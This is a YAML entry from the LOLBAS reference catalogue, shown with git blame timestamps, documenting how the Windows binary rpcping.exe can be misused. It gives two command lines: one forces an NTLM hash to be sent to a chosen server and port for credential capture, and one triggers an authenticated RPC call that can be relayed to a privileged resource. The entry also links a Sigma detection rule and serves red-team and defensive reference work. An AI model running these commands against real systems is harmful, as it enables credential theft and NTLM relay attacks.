LOLBAS/yml/OSBinaries/Rpcping.yml

42 lines
1.7 KiB
YAML
Raw Normal View History

2018-06-09 00:15:06 +02:00
---
Name: Rpcping.exe
Description: Used to verify rpc connection
Author: 'Oddvar Moe'
Created: 2018-05-25
2018-06-09 00:15:06 +02:00
Commands:
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
Usecase: Capture credentials on a non-standard port
Category: Credentials
Privileges: User
MitreID: T1003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
2021-09-29 23:27:16 +02:00
- Command: rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM
Description: Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).
Usecase: Relay a NTLM authentication over RPC (ncacn_ip_tcp) on a custom port
Category: Credentials
Privileges: User
MitreID: T1187
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\rpcping.exe
- Path: C:\Windows\SysWOW64\rpcping.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml
2018-06-09 00:15:06 +02:00
Resources:
- Link: https://github.com/vysec/RedTips
- Link: https://twitter.com/vysecurity/status/974806438316072960
- Link: https://twitter.com/vysecurity/status/873181705024266241
2021-09-29 23:27:16 +02:00
- Link: https://twitter.com/splinter_code/status/1421144623678988298
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
- Person: Vincent Yiu
Handle: '@vysecurity'
2021-09-29 23:27:16 +02:00
- Person: Antonio Cocomazzi
Handle: '@splinter_code'
2021-09-29 23:31:06 +02:00
- Person: ap
Handle: '@decoder_it'